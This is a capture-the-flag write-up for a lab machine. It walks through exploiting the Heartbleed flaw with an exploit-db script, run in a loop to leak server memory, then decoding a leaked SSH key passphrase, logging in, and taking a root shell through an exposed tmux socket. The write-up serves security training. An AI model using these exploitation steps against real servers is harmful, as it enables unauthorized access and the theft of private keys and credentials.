NETWORK


SCAN


ENUMERATION
Looking into the http port 80 we can see the following

Looking into the items revealed by the directories scans




FOOTHOLD
SSH access using private key
Let’s go ahead and download this key into our attack machine

Trying to use this key to access the server, we get asked for a password

Heartbleed
Looking into the headers exposed by the website, we can see that we are dealing with very old version of Apache and PHP

We then decide to look around the heartbleed vulnerability


Using the exploit found on exploit-db , we can confirm that our machine is vulnerable to Heartbleed


Cracking SSL key
Let’s collect more data
for i in $(seq 1 10000); do python2 32745.py 10.10.10.79 | grep -v "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00" > heartbeat-$i; done
We used fdupes to remove duplicates
fdupes -rf . | grep -v '^$' > files; xargs -a files rm -v


cat heartbeat-* | awk -F" " '{print $18}'

decoding this base64 data we then found the private key password
echo 'aGVhcnRibGVlZGJlbGlldmV0aGVoeXBlCg==' | base64 -d
heartbleedbelievethehype
openssl rsa -in hype_key -out hype_key_decrypted

SSH as Hype
Using the ssh key and the password from the previous steps, we are now into an SSH session on the server as user hype

PRIV ESCALATION
Looking into the .bash_history we can see the use of the command tmux

running the following command gave us the root shell
tmux -S /.devs/dev_sess
